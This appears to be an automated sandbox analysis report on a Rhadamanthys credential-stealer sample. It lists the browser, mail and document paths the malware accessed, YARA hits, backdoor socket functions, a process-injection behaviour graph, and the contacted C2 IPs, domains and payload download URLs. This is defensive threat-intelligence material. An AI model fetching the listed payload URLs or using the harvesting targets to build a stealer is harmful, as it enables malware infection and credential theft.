Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6f70cc77-7837-4f44-9c31-7de59e446d67 Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\safebrowsing\google4 Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\settings\main Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\safebrowsing Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\settings Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\settings\main\ms-language-packs\browser\newtab Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\cache2\doomed Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\thumbnails Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\settings\main\ms-language-packs Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\cache2 Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\settings\main\ms-language-packs\browser Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\cache2\entries Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Jump to behavior
Searches for user specific document files
Source: C:\Windows\System32\OpenWith.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Directory queried: C:\Users\user\Documents\BQJUWOYRTO Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: OpenWith.exe PID: 6960, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected RHADAMANTHYS Stealer
Source: Yara match File source: 11.3.OpenWith.exe.1bd88071e18.84.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000003.1599427862.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1601684073.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1662054663.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1616514622.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1758061652.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1788512707.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1631714527.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1607930303.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1636622080.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1790719264.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1637295094.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1602503505.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1505528408.000001BD854A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1621950664.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1614824639.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1603758838.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1606697672.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1601304637.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1807031317.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1594385953.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1598054710.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1625351972.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1605446278.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1599122967.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1631177009.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1604550057.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1835330246.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1622398648.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1630915907.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1610447240.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1623646235.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1592648399.000001BD88031000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1595094361.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1611340042.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1603435540.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1596720432.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1612017140.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1593833995.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1623171299.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1614239162.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1594138733.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1614513286.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1625054748.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1665607668.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1610863973.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1604127571.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1656743401.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1615770138.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1597744056.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.1489116263.00000000030E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1533595393.000000001C0C1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1596995655.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1601020298.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1662849713.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1607422599.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1592648399.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1605580653.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1655729634.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1600689319.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1594826093.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1595345338.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1630028343.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1596030593.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1596532747.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1616130125.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1613817370.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1612242561.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1607767904.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E956B50 bind,WSAGetLastError,closesocket, 3_2_00007FF79E956B50
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E956860 bind,listen,WSAGetLastError,closesocket, 3_2_00007FF79E956860
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6CCDF4 CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe, 14_2_00000203FE6CCDF4
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1529309 Sample: test.ps1 Startdate: 08/10/2024 Architecture: WINDOWS Score: 100 62 rocketdocs.lol 2->62 64 bg.microsoft.map.fastly.net 2->64 66 2 other IPs or domains 2->66 86 Suricata IDS alerts for network traffic 2->86 88 Found malware configuration 2->88 90 Antivirus / Scanner detection for submitted sample 2->90 92 15 other signatures 2->92 10 regsvr32.exe 1 2 2->10         started        13 powershell.exe 14 21 2->13         started        17 regsvr32.exe 2->17         started        signatures3 process4 dnsIp5 108 Sets debug register (to hijack the execution of another thread) 10->108 19 OpenWith.exe 10->19         started        76 bemostake.space 188.114.96.3, 443, 49716 CLOUDFLARENETUS European Union 13->76 78 rocketdocs.lol 188.114.97.3, 443, 49737 CLOUDFLARENETUS European Union 13->78 56 C:\Users\user\Desktop\utox_x86_x64.exe, PE32+ 13->56 dropped 58 C:\Users\Public\ajbs50ul.bat, PE32+ 13->58 dropped 110 Found many strings related to Crypto-Wallets (likely being stolen) 13->110 112 Drops PE files to the user root directory 13->112 114 Powershell creates an autostart link 13->114 116 Powershell drops PE file 13->116 23 ajbs50ul.bat 1 13->23         started        26 utox_x86_x64.exe 1 36 13->26         started        28 conhost.exe 13->28         started        80 185.196.9.174 SIMPLECARRIERCH Switzerland 17->80 82 8.8.8.8 GOOGLEUS United States 17->82 118 System process connects to network (likely due to code injection or exploit) 17->118 file6 signatures7 process8 dnsIp9 68 147.45.126.71, 3752, 49819 FREE-NET-ASFREEnetEU Russian Federation 19->68 94 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 19->94 96 Tries to steal Mail credentials (via file / registry access) 19->96 98 Found many strings related to Crypto-Wallets (likely being stolen) 19->98 106 2 other signatures 19->106 30 rekeywiz.exe 19->30         started        34 wmpnscfg.exe 19->34         started        36 rekeywiz.exe 19->36         started        54 C:\Users\user\AppData\Roaming\4smg.ini, PE32+ 23->54 dropped 100 Multi AV Scanner detection for dropped file 23->100 102 Suspicious powershell command line found 23->102 104 Found direct / indirect Syscall (likely to bypass EDR) 23->104 38 powershell.exe 37 23->38         started        40 regsvr32.exe 23->40         started        70 104.223.122.15 ASN-QUADRANET-GLOBALUS United States 26->70 72 192.168.2.7, 33445, 3752, 443 unknown unknown 26->72 74 23 other IPs or domains 26->74 file10 signatures11 process12 file13 60 C:\Users\user\AppData\Roaming\oSyU.ini, PE32+ 30->60 dropped 122 Suspicious powershell command line found 30->122 42 powershell.exe 30->42         started        45 regsvr32.exe 30->45         started        124 Writes to foreign memory regions 34->124 126 Allocates memory in foreign processes 34->126 47 dllhost.exe 34->47         started        128 Loading BitLocker PowerShell Module 38->128 50 conhost.exe 38->50         started        signatures14 process15 dnsIp16 120 Loading BitLocker PowerShell Module 42->120 52 conhost.exe 42->52         started        84 46.29.238.96 EUROTELECOM-ASRU Russian Federation 47->84 signatures17 process18
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
195.93.190.6
 unknown Ukraine
15713 GCN-UA false
104.233.104.126
 unknown Saudi Arabia
13886 CLOUD-SOUTHUS false
148.251.23.146
 unknown Germany
24940 HETZNER-ASDE false
163.172.136.118
 unknown United Kingdom
12876 OnlineSASFR false
95.215.44.78
 unknown Latvia
52173 MAKONIXLV false
193.124.186.205
 unknown Russian Federation
35196 IHOR-ASRU false
46.29.238.96
 unknown Russian Federation
34804 EUROTELECOM-ASRU true
8.8.8.8
 unknown United States
15169 GOOGLEUS false
37.97.185.116
 unknown Netherlands
20857 TRANSIP-ASAmsterdamtheNetherlandsNL false
130.133.110.14
 unknown Germany
680 DFNVereinzurFoerderungeinesDeutschenForschungsnetzese false
194.249.212.109
 unknown Slovenia
2107 ARNES-NETAcademicandResearchNetworkofSloveniaSI false
136.243.141.187
 unknown Germany
24940 HETZNER-ASDE false
37.187.122.30
 unknown France
16276 OVHFR false
147.45.126.71
 unknown Russian Federation
2895 FREE-NET-ASFREEnetEU true
185.14.30.213
 unknown Ukraine
21100 ITLDC-NLUA false
185.58.206.164
 unknown Russian Federation
35196 IHOR-ASRU false
51.254.84.212
 unknown France
16276 OVHFR false
80.87.193.193
 unknown Russian Federation
29182 THEFIRST-ASRU false
46.229.52.198
 unknown Ukraine
34056 KIEVNETKievNetISPASUA false
104.223.122.15
 unknown United States
8100 ASN-QUADRANET-GLOBALUS true
188.114.97.3
 rocketdocs.lol European Union
13335 CLOUDFLARENETUS false
205.185.116.116
 unknown United States
53667 PONYNETUS false
85.21.144.224
 unknown Russian Federation
8402 CORBINA-ASOJSCVimpelcomRU false
188.114.96.3
 bemostake.space European Union
13335 CLOUDFLARENETUS false
185.196.9.174
 unknown Switzerland
42624 SIMPLECARRIERCH true
198.98.51.198
 unknown United States
53667 PONYNETUS false

Private

IP
192.168.2.8
192.168.2.7
192.168.2.9
192.168.2.5
192.168.2.255

Contacted Domains

Name IP Active
bemostake.space 188.114.96.3 true
bg.microsoft.map.fastly.net 199.232.210.172 true
rocketdocs.lol 188.114.97.3 true
241.42.69.40.in-addr.arpa unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://147.45.126.71:3752/20846e26ac9fe96c52/8ackhmnt.9e5wm true
    		unknown
    https://rocketdocs.lol/utox_x86.exe false
      		unknown
      https://bemostake.space/test/ast21/g341g43134g/2245h1234/f21f2123/Rh-416-72-341-23.exe false
        		unknown